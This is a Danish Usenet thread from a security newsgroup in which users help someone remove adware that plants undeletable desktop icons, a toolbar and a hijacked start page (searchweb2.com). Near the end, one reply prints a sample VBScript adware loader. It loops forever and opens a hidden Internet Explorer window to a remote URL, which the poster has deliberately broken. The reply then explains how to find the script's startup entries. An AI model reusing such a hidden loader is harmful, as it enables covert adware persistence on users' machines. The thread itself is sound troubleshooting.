---

Hej dk.edb.sikkerhed

Her til morgen er min computer forpestet med ikoner på min desktop som
hedder "Website Hosting", Bingo, Casino Online, Printer Cartridges, Card
Games, Poker og Travel.

Det "sjove" ved disse 7 ikoner er, at jeg ikke kan slette dem?!!!

Desuden er min browser inficeret med nye links i favorit-folderen, samt en
toolbar der heller ikke lader sig slette, samt ny opstartsside og en
funktion der gør, at pop-ups nu igen er tilladt.

Alt i alt en rigtig fuckin' lortesuppedas. Hvordan kommer jeg disse
problemer kvit?

Har kørt en opdateret Ad-Aware. Det hjalp ikke. Kørte så et fuldt
system-tjek i Norton Antivirus, det hjalp heller ikke.

Er der kun "format C:" tilbage? For situationen er uholdbar.

--
Kent Kirkegaard Jensen
www.f1journal.com

---

Kong Kent wrote:

> Hej dk.edb.sikkerhed
>
> Her til morgen er min computer forpestet med ikoner på min desktop som
> hedder "Website Hosting", Bingo, Casino Online, Printer Cartridges, Card
> Games, Poker og Travel.
>
> Det "sjove" ved disse 7 ikoner er, at jeg ikke kan slette dem?!!!
>
> Desuden er min browser inficeret med nye links i favorit-folderen, samt en
> toolbar der heller ikke lader sig slette, samt ny opstartsside og en
> funktion der gør, at pop-ups nu igen er tilladt.
>
> Alt i alt en rigtig fuckin' lortesuppedas. Hvordan kommer jeg disse
> problemer kvit?
>
> Har kørt en opdateret Ad-Aware. Det hjalp ikke. Kørte så et fuldt
> system-tjek i Norton Antivirus, det hjalp heller ikke.
>
> Er der kun "format C:" tilbage? For situationen er uholdbar.

Overvej hvad du prøver på. Maskinen er inficeret med (lader det til) flere
forskellige slags malware. Når et fjendtligt program på maskinen har fået
systemrettigheder (igen, det lader det til), har de mulighed for at skjule
sig for programmer der prøver at finde dem, hvis ellers programmøren gad /
kunne finde ud af det.

Jeg ville helt klart reinstallere, men hvis det absolut ikke er en mulighed,
så prøv en eller flere af følgende:

- Pas bedre på
- Kør SypBot S/D
- Hiv netstikket ud

--
M.V.H
Christian Iversen

---

> Jeg ville helt klart reinstallere, men hvis det absolut ikke er en
> mulighed,
> så prøv en eller flere af følgende:
>
> - Pas bedre på
> - Kør SypBot S/D
> - Hiv netstikket ud

Jeg har netop lige kørt en fuldt opdateret SpyBot S+D , og den fandt
naturligvis en del spyware osv., og det hele blev fjernet og jeg har
"immuniseret" mit system derigennem. MEN! De ikoner kan stadig ikke fjernes
fra min desktop, og min browser er også stadig inficeret.

Er der virkelig ingenting jeg kan gøre udover en geninstallering?

--
Kent Kirkegaard Jensen
www.f1journal.com

---

Kong Kent wrote:
> Er der virkelig ingenting jeg kan gøre udover en geninstallering?

Det ved jeg ikke, måske/måske ikke.
Du giver ikke svar på mine spørgsmål, så det er lidt svært at hjælpe.

Betragte det evt. som gode lære penge, og tag backup af din
reinstallation, så du næste gang ikke skal bruge tid på det.

---

Kong Kent wrote:
> Hej dk.edb.sikkerhed
>
> Her til morgen er min computer forpestet med ikoner på min desktop som
> hedder "Website Hosting", Bingo, Casino Online, Printer Cartridges, Card
> Games, Poker og Travel.

Google er din ven.

http://www.google.com/search?hl=da&q=Website+Hosting+Bingo+Casino+Online+Printer+Cartridges+Card

> Det "sjove" ved disse 7 ikoner er, at jeg ikke kan slette dem?!!!
>
> Desuden er min browser inficeret med nye links i favorit-folderen, samt en

Hvad hedder linkene og hvad peger de på?

> toolbar der heller ikke lader sig slette, samt ny opstartsside og en

Hvordan ser toolbar'en ud?

> funktion der gør, at pop-ups nu igen er tilladt.

Hvad hedder opstartsiden.


Matcher det denne beskrivelse?

http://www.fortinet.com/VirusEncyclopedia/search/encyclopediaSearch.do?method=viewVirusDetailsInfoDirectly&fid=2056

> Alt i alt en rigtig fuckin' lortesuppedas. Hvordan kommer jeg disse
> problemer kvit?

Lær af dine fejl. Jeg gætter på du selv har været en medvirkende årsag
til problemmet.

Så inden du forsætter skal du finde ud af hvad som der er gjort forkert.

Har du en log over hjemmesider du har besøgt (firewall log, eller
history fra IE), eller blot generelt en log over hvad din maskine har
fortaget sig?

> Har kørt en opdateret Ad-Aware. Det hjalp ikke. Kørte så et fuldt
> system-tjek i Norton Antivirus, det hjalp heller ikke.

Hvad skal det hjælpe?

> Er der kun "format C:" tilbage? For situationen er uholdbar.

Personligt ville jeg ikke bruge 2 sek. på en maskine som er "taget", men
istedet reetablere fra en backup. Og derefter aldrig gentage den fejl...
(måske bortset fra i et test miljø for at finde ud af hvad som gik galt).


Reinstallere maskinen, derefter kan du forberede dig næste gang, ved at
tage en backup af den friske maskine. Fx kan du bruge ghost.
Derved vil reinstallationen næste gang kun tage ca 5 min.

---

Jeg har det samme problem og jeg besøger aldrig nogen vildt risikosider og
min søn har det samme problem og min datter også på hendes computer.


--
Hilsen

Annette

---

Anet wrote:

> Jeg har det samme problem og jeg besøger aldrig nogen vildt risikosider og
> min søn har det samme problem og min datter også på hendes computer.

Et vildt gæt. Bruger din datter el. søn din computer?

--
M.V.H
Christian Iversen

---

"Christian Iversen" <chrivers@iversen-net.dk> skrev i en meddelelse
news:cr24nh$28d6$1@news.cybercity.dk...
> Anet wrote:
>
>> Jeg har det samme problem og jeg besøger aldrig nogen vildt risikosider
>> og
>> min søn har det samme problem og min datter også på hendes computer.
>
> Et vildt gæt. Bruger din datter el. søn din computer?
>
> --
(klip)

Nej for vi bruger hver vores computer og der er kode på hinandens så ingen
kan bruge den andens.


--
Hilsen

Annette

---

Anet wrote:
> Jeg har det samme problem og jeg besøger aldrig nogen vildt risikosider og
> min søn har det samme problem og min datter også på hendes computer.

Har i nogen installeret nogen programmer, som i alle har?

--
Anders Lund - anders@andersonline.dk
Take back the web - www.mozilla.org/firefox

---

"Anders Lund" <anders@andersonline.dk> skrev i en meddelelse
news:cr27bo$2ap8$1@news.cybercity.dk...
> Anet wrote:
>> Jeg har det samme problem og jeg besøger aldrig nogen vildt risikosider
>> og min søn har det samme problem og min datter også på hendes computer.
>
> Har i nogen installeret nogen programmer, som i alle har?
>
>
det må være adaware eller norton så, for det er det eneste fælles vi har.


--
Hilsen

Annette

---

Anet wrote:
> Jeg har det samme problem og jeg besøger aldrig nogen vildt risikosider og
> min søn har det samme problem og min datter også på hendes computer.

Hvis du har samme problem, vil det hjælpe at du svare på mine spørgsmål.

---

> Hvad hedder linkene og hvad peger de på?

De peger alle på den samme søgemaskines hjemmeside (searchweb2.com som
beskrevet nedenfor)

>> toolbar der heller ikke lader sig slette, samt ny opstartsside og en
>
> Hvordan ser toolbar'en ud?

Der er en søgefunktion i venstre side, og der ved siden af så 8 faneblade
som hver indeholder ord der har med siden at gøre som man er på. Disse ord
skifter alt efter hvilken hjemmeside man kigger på.

>> funktion der gør, at pop-ups nu igen er tilladt.
>
> Hvad hedder opstartsiden.

Det er en meget lang adresse der dog hurtigt ændres til:
http://searchweb2.com/

> Matcher det denne beskrivelse?
>
> http://www.fortinet.com/VirusEncyclopedia/search/encyclopediaSearch.do?method=viewVirusDetailsInfoDirectly&fid=2056

Den side kan jeg sjovt nok ikke få lov at loade. Så ender den bare med "Not
Responding"...

> Lær af dine fejl. Jeg gætter på du selv har været en medvirkende årsag til
> problemmet.

Det er der ingen tvivl om. Jeg må enten have surfet på en giftig side
og/eller været for dårlig til at holde min firewall og virus-scanner
opdateret, samt ikke brugt AdAware ofte nok.

> Har du en log over hjemmesider du har besøgt (firewall log, eller history
> fra IE), eller blot generelt en log over hvad din maskine har fortaget
> sig?

Nope. De filer er sjovt nok også slettet fra folderne.

--
Kent Kirkegaard Jensen
www.f1journal.com

---

Den 01-01-05 17.16 skrev Kong Kent følgende:

> Det er en meget lang adresse der dog hurtigt ændres til:
> http://searchweb2.com/

Det er lop.com, der står bag den. Hvis du kigger nederst på siden, er
der et link til en hjælpeside:
http://66.220.17.157/help.html

Tjek den. Selvom man normalt skal passe på med at stole på den slags
reklametjenester, har jeg endnu ikke oplevet nogen få problemer ved at
benytte lop.coms afinstallationsmetoder.

> Det er der ingen tvivl om. Jeg må enten have surfet på en giftig side
> og/eller været for dårlig til at holde min firewall og virus-scanner
> opdateret, samt ikke brugt AdAware ofte nok.

Næh, du har såmænd selv installeret det, og du er ganske givet blevet
oplyst herom i licensbetingelserne. Selvom du får fjernet skidtet,
risikerer du at det kommer igen, når du bruger det program, som det blev
installeret sammen med.

--
Mvh. Kim Ludvigsen
Nemmere, hurtigere og mere sikkert internet med Firefox
http://kimludvigsen.dk

---

>> Det er en meget lang adresse der dog hurtigt ændres til:
>> http://searchweb2.com/
>
> Det er lop.com, der står bag den. Hvis du kigger nederst på siden, er der
> et link til en hjælpeside:
> http://66.220.17.157/help.html
>
> Tjek den. Selvom man normalt skal passe på med at stole på den slags
> reklametjenester, har jeg endnu ikke oplevet nogen få problemer ved at
> benytte lop.coms afinstallationsmetoder.
>
>> Det er der ingen tvivl om. Jeg må enten have surfet på en giftig side
>> og/eller været for dårlig til at holde min firewall og virus-scanner
>> opdateret, samt ikke brugt AdAware ofte nok.
>
> Næh, du har såmænd selv installeret det, og du er ganske givet blevet
> oplyst herom i licensbetingelserne. Selvom du får fjernet skidtet,
> risikerer du at det kommer igen, når du bruger det program, som det blev
> installeret sammen med.

Men hvordan pokker finder jeg ud af hvilket program det er? For jeg har ikke
installeret noget de seneste par dage. Så det virker underligt at det "bare"
lige pludselig sker en dag uden jeg har gjort noget nævneværdigt for det?

--
Kent Kirkegaard Jensen
www.f1journal.com

---

Den 01-01-05 18.46 skrev Kong Kent følgende:

>>Næh, du har såmænd selv installeret det, og du er ganske givet blevet
>>oplyst herom i licensbetingelserne.
>
> Men hvordan pokker finder jeg ud af hvilket program det er?

Du kan prøve at være opmærksom på, hvilke programmer du har brugt, hvis
den kommer tilbage, eller hvilke programmer som eventuelt ikke virker
længere.

Meld for øvrigt også lige tilbage med resultatet, hvis du prøver at
fjerne skidtet med en af metoderne fra lop.coms hjælpeside.

--
Mvh. Kim Ludvigsen
Indspil og brænd musik-cd'er og få styr på musikken med iTunes
http://kimludvigsen.dk

---

Kong Kent wrote:
> Men hvordan pokker finder jeg ud af hvilket program det er? For jeg har ikke

http://www.google.com/search?hl=da&lr=&q=%22lop.%2Bcom%22

Du kan evt. også søge efter danske sider.

---

"Kong Kent" <kongkentREMOVE@REMOVEanarki.dk> skrev i en meddelelse
news:41d6ccc8$0$51250$14726298@news.sunsite.dk...
> > Hvad hedder linkene og hvad peger de på?
>
> De peger alle på den samme søgemaskines hjemmeside (searchweb2.com som
> beskrevet nedenfor)
>
> >> toolbar der heller ikke lader sig slette, samt ny opstartsside og en
> >
> > Hvordan ser toolbar'en ud?
>
> Der er en søgefunktion i venstre side, og der ved siden af så 8 faneblade
> som hver indeholder ord der har med siden at gøre som man er på. Disse ord
> skifter alt efter hvilken hjemmeside man kigger på.
>
> >> funktion der gør, at pop-ups nu igen er tilladt.
> >
> > Hvad hedder opstartsiden.
>
> Det er en meget lang adresse der dog hurtigt ændres til:
> http://searchweb2.com/
>
> > Matcher det denne beskrivelse?
> >
klip ...

Hmm, det lyder som noget jeg har set en del gange før ... Ad-aware og
lignende synes ikke altid at fange disse "tiltag".

Tricket som folkene benytter er at "dumpe" et VBS script eller URL på din
disk, som indlæses hver gang din maskine booter !

Navnet på filen kan variere meget men scriptet kan have følgende indhold:

while 1
wscript.sleep 3600000
set search = createobject("internetexplorer.application")
search.height = 0
search.menubar = 0
search.statusbar = 0
search.toolbar = 0
search.width = 0
search.navigate "http://vbs . searchwww . com/ vbs.cgi" Har rettet lidt i
url'en, så den ikke burde virke.
do while search.busy
wscript.sleep 1000
loop
if search.height = 0 and search.width = 0 then
search.quit
else
search.visible = 1
end if
wend

Hvorfra startes det så ... tja mulighederne er mange, men start med et check
af registreringsdatabasen.
Søg hhv på "Run", "Runonce" og "RunOnceEx" - kig kun på nøgler og find de
steder, hvor der eventuelt optræder en url eller en sti til en vbs-fil.
Bemærk at så længe scriptet er aktivt (det looper jo i en uendelighed)
bliver ikonerne installeret igen og igen og igen ....

Check også Programmer -> Start

Søg evt disken for alle filer af typen .vbs, .bat, .cmd .. for indhold med
eks. "create.object".

/Banditten